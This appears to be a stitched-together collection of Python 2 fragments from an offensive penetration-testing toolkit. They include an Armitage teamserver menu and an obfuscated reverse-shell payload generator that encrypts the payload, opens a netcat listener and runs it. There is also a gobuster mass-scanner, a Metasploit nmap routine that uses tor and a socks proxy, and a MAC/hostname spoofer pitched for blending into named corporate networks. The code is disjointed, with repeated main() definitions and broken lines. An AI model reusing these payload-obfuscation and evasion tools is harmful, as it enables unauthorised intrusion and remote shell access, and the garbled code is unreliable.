def main():
print toolkits.cyan("""
\n\n\n
\t\tForeplay, EZ-Mode Armitage Teamserver Collaboration Menu
\n\t\t\t\tCOMMANDS\n
LAUNCH - Launch the Armitage Teamserver using NEW CREDENTIALS
LOAD - Load PREVIOUSLY SAVED CREDENTIALS and launch a teamserver from that
EXIT - Exit program
""")
opt_choice = str(raw_input(toolkits.yellow("Enter a COMMAND: ")))
if opt_choice == "LAUNCH":
collect_teamserver_creds(save_file)
main()
elif opt_choice == "LOAD":
load_saved_teamserver_creds(save_file)
main()
elif opt_choice == "EXIT":
print toolkits.red('Received exit command, exiting!')
exit(0)
else:
print toolkits.red(
'You have entered a invalid option, please try again')
main()
return
def main():
decryptKey = generateKey()
decryptIV = generateIV()
code = read_template()
template_reverse_shell
payloadNoEncrypt = template_reverse_shell.splitlines()
shuffledPayload = commandSegmentationTech(payloadNoEncrypt)
# writableLines = convertIntoLines(shuffledPayload)
l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV)
outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV)
print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload)))
out = b64encode(l_encrypted)
print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out)))
print green("DEBUG: Payload generated at\r\n{}".format(str(outfile)))
rp = open(outfile, 'rb+')
uniquePayload = rp.read()
print red("DEBUG: Contents of {}\r\n".format(str(outfile)))
print yellow(uniquePayload)
print cyan("Opening netcat session")
os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(
str(LPORT)))
print green("You may run the payload with\r\npython {}".format(
str(outfile)))
time.sleep(2)
print green("Executing payload")
os.system("python {}".format(str(outfile)))
return
def main():
print "MassGoBuster. Automatically run gobuster against a wordlist of host,port.\r\nComing soon: Threading by running 5 gobuster processes at a time."
if len(sys.argv) < 2:
print toolkits.yellow(
"Usage:\r\npython massgobuster.py <wordlist of host,ports> <wordlist of paths> <OPTIONAL: threads, default=10>"
)
print toolkits.cyan(
"\r\nEXAMPLE: python massGoBuster.py targetHostPort.txt /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 50\r\nEXAMPLE EFFECT: Runs GoBuster at a rate of 50 threads against each target,port combo found in the list of targets using the wordlist"
)
exit(0)
else:
inputFile = sys.argv[1]
readInputFile(inputFile)
return
def cyan(string):
string = toolkits.cyan(string)
print string
return string
def initial_scan(target_list):
resource_file_default = '/tmp/resource_file_default.rc'
print toolkits.cyan("Your selected target list file is {0}".format(
str(target_list)))
workspace = str(raw_input("Enter your Metasploit WORKSPACE: "))
if workspace == "" or None:
workspace = "default"
else:
pass
# restarts tor
TOR_restart_cmd = "service tor restart"
os.system(TOR_restart_cmd)
save_file_location = "/root/Documents" # default nmap xml saved files location
# asks user for a list of targets he wants to scan as a simple text file with one IP address or hostname per line
# these are all of the enumeration scripts
enum_scripts = """ajp-headers.nse,http-headers.nse,http-security-headers.nse,http-server-header.nse,cics-enum.nse,cics-user-enum.nse,citrix-enum-apps.nse,citrix-enum-apps-xml.nse,citrix-enum-servers.nse,citrix-enum-servers-xml.nse,dns-nsec3-enum.nse,dns-nsec-enum.nse,dns-srv-enum.nse,domino-enum-users.nse,eppc-enum-processes.nse,http-domino-enum-passwords.nse,http-drupal-enum.nse,http-drupal-enum-users.nse,http-enum.nse,http-gitweb-projects-enum.nse,http-svn-enum.nse,http-userdir-enum.nse,http-wordpress-enum.nse,krb5-enum-users.nse,msrpc-enum.nse,mysql-enum.nse,ncp-enum-users.nse,nrpe-enum.nse,omp2-enum-targets.nse,oracle-enum-users.nse,rdp-enum-encryption.nse,sip-enum-users.nse,smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-mbenum.nse,smtp-enum-users.nse,ssh2-enum-algos.nse,ssl-enum-ciphers.nse,tftp-enum.nse,tso-enum.nse,vtam-enum.nse"""
# generates random time str to make the .xml file unique
timestr = timestr = time.strftime("%Y%m%d-%H%M%S")
# runs scans in this order, FIN, XMAS, and COMPREHENSIVE
# the problem is that
# we cannot multiplex additional commands into msf console with the -x option
# the resource file option is slow as f**k.
FIN_scan_cmd = """db_nmap -v -O -sF -Pn -T4 -O -F -oX {2}/FIN_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
str(enum_scripts), str(target_list), str(save_file_location),
str(timestr))
#timestr = timestr = time.strftime("%Y%m%d-%H%M%S")
XMAS_scan_cmd = """db_nmap -v -O -sX -Pn -T4 -O -F -oX {2}/XMAS_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
str(enum_scripts), str(target_list), str(save_file_location),
str(timestr))
#timestr = timestr = time.strftime("%Y%m%d-%H%M%S")
COMPRE_scan_cmd = """db_nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 -oX {2}/COMPRE_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
str(enum_scripts), str(target_list), str(save_file_location),
str(timestr))
# runs all of these commands immediately after metasploit starts up.
MSF_cmd = "workspace -a {0};setg WORKSPACE {0};{2};resource {1}".format(
str(workspace), str(resource_file_default), str(FIN_scan_cmd))
print toolkits.yellow("""
DEBUG: db_nmap lines
{0}
""").format(str(MSF_cmd))
time.sleep(3)
db_nmap_resource_file = """
use auxiliary/server/socks4a
run -j
{0}
{1}
{2}
""".format(str(FIN_scan_cmd), str(XMAS_scan_cmd), str(COMPRE_scan_cmd))
print toolkits.yellow("""
DEBUG: Resource file content
{0}
""").format(str(db_nmap_resource_file))
w = open(resource_file_default, 'w')
w.write(db_nmap_resource_file)
w.close()
print toolkits.yellow("""
DEBUG: Location of resource files
{0}
""").format(str(resource_file_default))
debug_str = """ls -la {0}""".format(str(resource_file_default))
bash_command(debug_str)
host_cidr_range = ''
darkoperator_resource_file = """
workspace {0}
load pentest
network_discovery -d -v -r {1}
""".format(str(workspace), str(host_cidr_range))
MSF_cmd_exec(MSF_cmd)
return MSF_cmd, resource_file_default
banner = """
Macchanger Improved
A needed makeover for a reknowned pentest tool
'Automatically selects the CLOSEST non-conflicting MAC address by randomizing the last portion of the MAC'
'Farms new real hostnames and MAC address ranges'
'Swaps your hostname independently, allowing you to assume other identities or blend into corporate network routers and WDS systems, like UNLV-Secure, UNLV-Guest, or IGT-Gaming'
Chang Tan
Lister Unlimited Cybersecurity Solutions, LLC.
[email protected]
Macchanger Improved is Part of the Hyperjacker's Toolkit
Open-Source Penetration Testing Toolkits are NOT AVAILABLE FOR RESALE.
"""
print cyan(banner)
def main():
menu = """Exit
Farm new MAC addresses to impersonate
Wi-Fi Hostname Farmer, Farm new Hostnames (Computer ID's) to impersonate
Activate Switch Identity + MAC address
View impersonatable names
View impersonatable MAC addresses
LAN Hostname Farmer, Farm locally connected Hostnames using NetDiscover"""
print """
(run python install.py)
INSTALL. Install both the Python and Debian/Kali APT Prerequisites